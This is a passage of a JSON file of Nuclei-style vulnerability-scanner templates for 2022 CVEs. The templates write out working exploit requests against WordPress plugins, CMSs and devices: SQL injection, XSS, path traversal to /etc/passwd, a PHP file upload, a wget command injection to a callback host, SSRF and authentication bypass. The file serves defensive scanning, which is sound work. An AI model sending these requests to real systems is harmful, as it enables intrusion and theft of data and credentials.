WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, '<title>index</title>')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, '<title>index</title>')"],"condition":"and"}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-29009","info":{"name":"Cyber Cafe Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ccms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=%27+Or+1--+-&password=1&login=\n","GET /ccms/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CCMS Admin Dashboard","CCMS ADMIN | Admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: 